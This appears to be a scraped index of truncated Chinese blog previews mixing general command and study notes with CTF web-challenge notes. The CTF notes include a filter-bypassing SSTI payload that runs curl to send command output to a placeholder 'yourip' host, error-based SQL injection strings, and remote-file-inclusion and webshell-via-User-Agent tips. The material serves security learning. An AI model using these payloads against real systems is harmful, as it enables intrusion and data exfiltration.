Spencer

12345678ps -ef | grep 进程关键字lsof -i:port. 可以查看端口被占用情况file `which php`辨识php的类型，也就是架构等。kill -QUIT 进程号（要杀主进程）brew services restart php启动php服务，也就是php-fpm等等docker-compose up -d启动容器composer(一个下载器，就像wget)nginx -s stop停止nginx服务 下面是录制视频的命令，我们通常用ffmpeg命令行来做剪辑。 ffmpeg常用的是转换格式和，剪辑拼接两三个功能。 12345转换格式：ffmpeg -i 文件 -c copy 输出文件（带后缀）拼接：先将要拼接的视频路径写入txt，格式如下file '路径1'file '路径2'然后ffmpeg -f concat -safe 0 -i 1.txt -c copy output.mp4即可！ 在vscode中 12多行注释：先按ctrl + k，再按ctrl + c取消多行注释：先按ctrl + k，再按ctrl ...

我们可以自己设置User-Agent的值。当我们可以控制User-Agent的值时，也就意味着我们完全可以构造一个POST请求，因为Content-Type和Content-Length都在User-Agent之下，而控制这两个是利用CRLF发送POST请求最关键的地方。 1$_SERVER['REMOTE_ADDR']#获取最后一个代理的IP也就是直接和服务器代理或服务器交互的IP。 PHP中的join函数 1join(seperator, array)#把数组合并为字符串，并且在数组之间加入设定的seperator。 vim快捷键跳转到本文最后一行首字母：shift + g 跳转到最后一行最后一个字母：g + $ 跳转到本行首：0 soapclient的利用soapclient的原理我们来看一下PHP中含魔方法的内置类 魔术方法:一般都是系统在特定时机自动调用的函数或方法,绝大多数情况下不需要程序员手动调用。 12345678910111213141516171819202122232425<?php$classes = get_declared_clas ...

12$array = ['abbr','sdjsl','ss'];implode("",$array); 此函数负责把数组连接起来，放到新的双引号里。 正则表达式\w表示匹配字母数字下划线，也就是 1\w即[a-zA-Z0-9_] \S表示匹配非空白符号，注意这里是大写，小写\s表示匹配空白符号，即space。 1234567891011<?phpfunction test($str){ echo "This func is run $str";}$a = 'test("\1")';$b = 'aaa$caaa';$c = 'CXS';echo preg_replace("/aaa(.+?)aaa/ies",$a,$b); 运行结果： 12This func is run CXSProcess finished with exit code 0 在PHP当中 ...

8.12做了一个新生题，写一下XMAN SSTI注入的题当时想了各种方法绕过滤，都不成功，今天看到一种关键字，之所以能绕过是因为在各种漏洞poc中提到很少，一般不会重视 就是config, 我们可以将class表示为claconfigss,其他单词同样如此，并且在注入语句中可以用条件语句 1{%iconfigf ''.__claconfigss__.mconfigro__[2]}.__subclaconfigses__()[59].__init.func_glconfigobals.linecconfigache.oconfigs.popconfigen('curl http://yourip:port/ -d ls / | grep flag;') %}1{ endiconfigf %} curl命令一般用来获取网站信息 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484 ...

2021/8/20WEB攻关,ERC20代币单词积累： 1234567891011121314151617181920designate任命，委派，指定recursive递归的precede vt/vi 在、、发生之前succinctness n.简明，简化marginal n.边缘的，临界的，边缘席位。defer推迟，拖延，听从collateral n.担保物 adj.附属的，旁系的。interest n.利息fragment n.片段 V.使分裂，使破裂beneficiary n.受益人，财产继承人inception n.开端，初期populate v.居住于，生活于..finalize v.最后确定validate v.确认validation n.确认，有效，检验embed v.(使)嵌入invoke v.调用intrinsic 固有的，内在的 hackworld继续写12345678910111213141516171819202122import requestsfrom IPython.core import payloadurl = &q ...

2021/9/10 可能涉及到git泄露[GXYCTF2019]禁止套娃123.git为初始化git仓库时产生的管理git仓库的隐藏文件夹，包含git操作的所需要的东西。.swp这是在vim编辑时产生的临时文件，与.git类似。vim中的swp即swap文件，在编辑文件时产生，它是隐藏文件，如果程序正常退出，临时文件自动删除，如果意外退出就会保留，文件名为 .filename.swp。 可能存在vim泄露的题目，留下.swp文件，我们访问有的时候可以直接拿到flag。 这个就是一个仓库的文件。 1234567info存放仓库信息hook存放sheetobject存放所有git对象。refs:存放提交hash的地方config:github的配置信息description：仓库的描述信息，主要给gitweb等git托管系统使用HEAD:映射到ref引用，能够找到下一次commit的前一次哈希值。 把这个题刷完之后练习一下git命令建立一个仓库代码储存平台之类的。 这是kali里面的例子。 在kali里面对本题查找git泄露。成功。拿到index.php源码即可。 123456789 ...

2021/8/17WEB攻关WEB刷题HARDSQL注入采用了报错注入，用的extractvalue这次用了一个特殊符号^代替and作为连接符，因为 看到其他大佬的blog发现这个符号不报错，而or,and,space等符号均报错，所以挺难的。下面查表名和列名 用like代替等号，用括号代替空格。 非常的麻烦。 1?username=1&password=1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))%23 下面查列名。 1?username=1&password=1'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_schema)like('gee ...

2021/9/16MANIM笔记安装教程太多我就不多说了 安装多让大家安装manimgl manimgl或者manim render都可以。 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283Usage: python -m manim render [OPTIONS] FILE [SCENE_NAMES]... Render SCENE(S) from the input FILE. FILE is the file path of the script. SCENES is an optional list of scenes in the file.Global options: -c, --config_file TEXT Specify the configuration file to ...

2021/9/28 python高级re脚本学习正则表达式不说了，复习n遍了，来看【高明的黑客】题目分析解题脚本： 1234567import os;import sys;import requests;import threading;import time;print("开始时间: "+ time.asctime(time.localtime(time.time()))); 这里先解释一堆time函数 time.asctime()是返回可读现在时间形式，形式为1Tue Feb 17 09:42:58 2009; time.localtime()返回时间的元组形式： 1time.localtime() : time.struct_time(tm_year=2016, tm_mon=11, tm_mday=27, tm_hour=10, tm_min=26, tm_sec=5, tm_wday=6, tm_yday=332, tm_isdst=0) time.time()表示从1970.1.1开始到现在的时间（seconds） 12time.time()Out[3 ...

2022/1/29复习WEB今天看了看SSRF就是通过构造恶意URL使服务器执行恶意代码在内网中查询我们无法穿透的机器，然后再通过服务器返回到我们的主机。 今天又看了看文件包含，主要是远程文件包含，在PHP5.5以前吧， 1file_url_fopen和file_include_fopen是打开的，也就是允许代码中包含远程php端文件。 执行远程文件包含漏洞的技巧 注意每个浏览器可能记录访问日志，要写一句话木马的话要写在User-Agent中，写在URL中都会被储存了。 或者是这样，利用PHP伪协议，来执行 2.或者是写SESSION文件 PHP中的SESSION文件用于存储SESSION数据，它是根据PHPSESSID来命名存储文件，常见路径： /var/lib/php/sessions/sess_{PHPSESSID} /var/lib/php/sess_{PHPSESSID} /tmp/sess_{PHPSESSID} /tmp/sessions/sess_{PHPSESSID} 远程文件包含漏洞检测： （1）向目标参数指定远程 URL 发起请求，确定远程服务器是否收到相应请求 ...